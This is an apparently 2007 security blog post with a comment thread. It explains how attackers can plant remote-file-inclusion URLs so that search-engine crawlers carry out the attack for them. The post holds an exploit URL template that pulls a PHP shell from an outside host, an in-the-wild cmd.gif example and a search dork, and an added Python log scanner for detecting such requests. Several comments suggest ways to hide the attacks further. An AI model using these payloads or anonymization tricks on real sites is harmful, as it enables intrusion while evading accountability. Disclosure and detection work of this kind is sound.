Anonymizing RFI Attacks Through Google

google can be utilized to hack into websites, actively exploiting them (as opposed to the information gathering known as “google hacking”, although that is how most of the sites vulnerable to rfi attacks are found).

when a url is placed on any web page, google will find it, visit it and then index it. with this mechanism, it is possible to anonymize attacks on third party web sites by routing them through google’s crawler.

poc -
a malicious web page is constructed by an attacker, containing a url built like so:
1. third party site uri to attack.
2. file inclusion exploit.
3. second uri containing a malicious php shell.

example url:
http://victim-site/rfi-exploit?http://uri-with-malicious-code.php

google will harvest this url, visit the site using its crawler and index it, meaning it accesses the target site with the url it was provided and exploits it unwittingly on behalf of whoever planted it. it’s a feature, not a bug.

this is currently exploited in the wild. for example, try searching google for:
inurl:cmd.gif

and note, as an example:
www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/cmd.gif?cmd
which is no longer vulnerable. the %20 seems out of place, but this is how it is shown in the search.

why use a botnet when one can abuse the google crawler, which is allowed on most web sites?

notes:
1. this attack was verified on google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. file inclusions seem to tie in well with this attack anonymizer, but there is no reason why other attack types can’t be used in a similar fashion.
3. the feature might also be used to anonymize communication, as a covert channel.
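The defensive counterpart of the mechanism described above (and of note 1, since whichever crawler follows the planted link sends the same request the attacker wrote): an added example, not code from the original post, that scans access-log lines for a request parameter carrying an absolute URL to a foreign host, which is the shape of the exploit url shown. The user agent is reported but never trusted, and a referer is kept because a visitor who clicks the planted link may leak where it was planted. The host name victim-site, the addresses and the log lines are constructed for this example.

```python
"""Flag remote-file-inclusion (RFI) attempts in web server access logs.

Added example, not code from the original post.  The exploit URL in the
post has the shape  victim-site/page?param=http://remote-host/shell  so the
detector looks for a request parameter whose value (or bare name) is an
absolute URL to a host other than our own.  The user agent is reported but
never used as a trust signal: a crawler that follows a planted link sends
exactly the request the attacker wrote.  Host names, IPs and log lines are
constructed for this example.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Loose on purpose: the in-the-wild sample in the post reads "http:/%20/host",
# which strict URL parsing would not recognise as having a host at all.
REMOTE_RE = re.compile(r'^(?:https?|ftp):/', re.IGNORECASE)


def parse_line(line):
    """Split one combined-format log line into its fields, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_remote_urls(target, own_host="victim-site"):
    """Return (param, url) pairs where a query value is a URL to another host."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        candidate = value or name          # "?http://x" has no "=", so it lands in name
        if not REMOTE_RE.match(candidate):
            continue
        host = urlsplit(candidate).netloc.lower()
        if host == own_host.lower():
            continue                       # points at ourselves, not foreign code
        hits.append((name if value else "<bare>", candidate))
    return hits


def scan(lines, own_host="victim-site"):
    """Return one finding per log line that carries an RFI-shaped parameter."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = find_remote_urls(rec["target"], own_host)
        if not hits:
            continue
        findings.append({
            "ip": rec["ip"],
            "param": hits[0][0],
            "remote": hits[0][1],
            "status": rec["status"],
            "ua": rec["ua"],
            # A crawler sends no referer; a human who clicked the planted link
            # may leak the page it was planted on, which is worth keeping.
            "referer": None if rec["referer"] == "-" else rec["referer"],
        })
    return findings


# Constructed sample log (documentation IP ranges, invented hosts).
SAMPLE_LOG = [
    # ordinary request, nothing to flag
    '192.0.2.10 - - [10/Mar/2007:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    # crawler following a planted link: the foreign URL sits in the query string
    '192.0.2.5 - - [10/Mar/2007:10:00:02 +0000] "GET /index.php?page=http://203.0.113.66/cmd.gif HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"',
    # a visitor who clicked the same link: the referer shows where it was planted
    '198.51.100.7 - - [10/Mar/2007:10:00:03 +0000] "GET /rfi-exploit?http://203.0.113.66/cmd.gif HTTP/1.1" '
    '500 0 "http://example.test/planted.html" "Mozilla/5.0"',
    # an absolute URL back to our own host is not an inclusion of foreign code
    '198.51.100.8 - - [10/Mar/2007:10:00:04 +0000] "GET /index.php?page=http://victim-site/about HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']:<14} param={f['param']:<7} -> {f['remote']}  ua={f['ua']!r}  referer={f['referer']}")
```

Run as a script it prints the two flagged requests, the crawler's and the visitor's, and ignores the self-referencing one. Because the signal is the payload rather than the source address, blocking the crawler (the option raised in the comments) is unnecessary; on the PHP side the same class of request is neutralised by serving includes only from an allow-list of local names and leaving allow_url_include off.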

noam rathaus.
(with thanks to Sun Shine and lev toger)

  • http://www.nastynerds.com MERLiiN

    This isn’t exactly new, but it was nice to see some more concrete examples.
    To make it somewhat harder to trace a large list of generated urls could be made to go to a 404 page which in turn issues a 301 redirect to vulnerable urls from a database populated by previous google searches. Google follows the 301 and if possible (think php’s ob_start) receives another 301 from the command shell to redirect it to a known site.
    Google will have hacked the website and not indexed it. All you need is a script to handle the 404 requests and some vulnerable urls for google to crawl. Heck, why not make Google submit the defaced page to Zone-H if you are carefree.

  • Pingback: Stefans Home

  • http://stefan.ploing.de/node/206 Stefan

    What about the referer header? Google omits it, but how do different search spiders behave? If a website visitor inadvertently clicks the prepared link, a referer entry will be stored in the victim’s log – which might lead back to the attacker.
    Yes, some free web space can further hide the attacker’s trace – but this might be the point when using an anonymous net access (like an internet cafe) in the first place would be easier.
    Nevertheless an interesting idea :)

  • LoP

    This concept was already described in Phrack 57 [1]. Which was published back in 2001.

    [1] http://www.phrack.org/archives/57/p57-0x13

  • Stefan Esser
  • blerg

    it’s nice to see this exploited in the wild. maybe now it will actually get fixed.

  • Pingback: Rory.Blog

  • http://ryanlrussell.blogspot.com/ Ryan Russell

    Congrats on the Slashdot link. I had observed Google being used for simpler attacks a number of years ago. Some of them were mentioned in a Register story.

  • Breakable

    Don’t think likely for this method to be exploited widely, as its complicated and inconvenient – you must be sure your exploit works correctly, and you need to wait for the googlebot to follow your link (which takes some time).

    More likely attackers will stick to the botnets for now.

  • Frank Knobbe

    As mentioned this has been around for a while (and used in finding vulnerable websites and open-proxies). However, everyone seems to focus on Google. We’ve seen similar attacks perpetrated by the MSN search engine as well. I’m sure other search engines could also be coaxed to perform anonymous reconnaissance for an attacker.

    This is a pain for self-defending networks since you can’t block the original attacker. Blocking Google is counter-intuitive but may eventually become a necessity if these problems aren’t addressed.

  • Pingback: Anonymous

  • http://Notabigdeal. Bob

    This isn’t something that is easily fixed. Then again, it’s really not a big deal. It is just one of a hundred ways an attacker can hide their tracks. It’s like an anonymous proxy, such as tor, but slower.

    Remember kids. You are usually only somewhat anonymous on the internet. But an attacker that is careful is nearly impossible to find.

  • Rob

    I don’t think this is a real threat. Anyone using this exploit could have the original site traced using the google search for sites which linked to the script executed. From here the original user could also be traced.
    I think insecure redirection scripts are a much greater threat. In a single url, you could call multiple sites’ redirection scripts which eventually lead to a script which delivers the payload. This would be instant and hard to trace back as only the previous jump would be detectable. By redirection script, I mean ones which include the content rather than true redirection. Another option would be to list the link in wikipedia or digg or similar high traffic sites. These seem to get indexed more frequently and if you are lucky, will also get mirrored and visitor clicks, also calling the script. Just give the text an attractive name!

  • Anonymous

    You have a lack of understanding of what you’re seeing. You’ve stumbled across sites that are being used in PHP include() attacks. Great big deal. The other point you’re trying to get at is that google can be used to auto attack websites (the example you cite doesn’t work exactly as you think it does), this is nothing new, lcamtuf came up with this at least five years ago:
    http://www.phrack.org/archives/57/p57-0x13

    Congrats on being late to the party, not bringing any intellectual gifts, and still making slashdot.

  • Pingback: iBlog - Ilia Alshanetsky

  • Newbie

    Do Google and other crawlers index pages with more than one parameter?

    I remember that Google indexes pages with only one parameter in the query string.

  • johnny h4x0r

    what a lame article. is this article worth reading? why do u write such stuff. do u even know what is the full form of poc? what u described is a simple google crawling technique. as for the anonymous thing, is google a browser? lamer u cant chk the site whether its vuln without trying it in ur browser or something. if u r happy to see ur “poc” sites in google results and think its vuln and u think u have hacked a site “anonymously” then its a different story.

  • http://www.none.com Haider

    what a lame story u have published?? do u have any idea about what u were goin to describe and what u have described? how come it is anonymous? can u explain me?? were u tryin to explain about how irc bots can search through vuln hosts by using google search and exploit it automatically??? man through browser google can search Hosts but doesnt automatically exploit ‘em lol go and read more abt RFI attacks and yess u lame kidd how come its POC ??? heheh have u released any Kernel Exploit??? -;)
    bye lamer

  • Mr utts

    Dear lord,

    Haider I hope to god English is not your primary language you speak or write in.

    Did you even freaking read the post from the guys or did you just start typing rambling shit?

  • http://www.toomuchcookies.net/ Omar

    Just apropos: My site (toomuchcookies) was never vulnerable (as far as I know). The search engines produced something, because some idiot tried to search for that string (cmd.gif) on my site and it got recorded under “SE-Queries”..

  • http://www.tercumeservisi.com tercüme

    SecuriTeam Blogs » Anonymizing RFI Attacks Through Google Interesting post at the Securiteam blog, giving some more details on the idea of using google to hack for you by causing it to spider links which contain exploits.
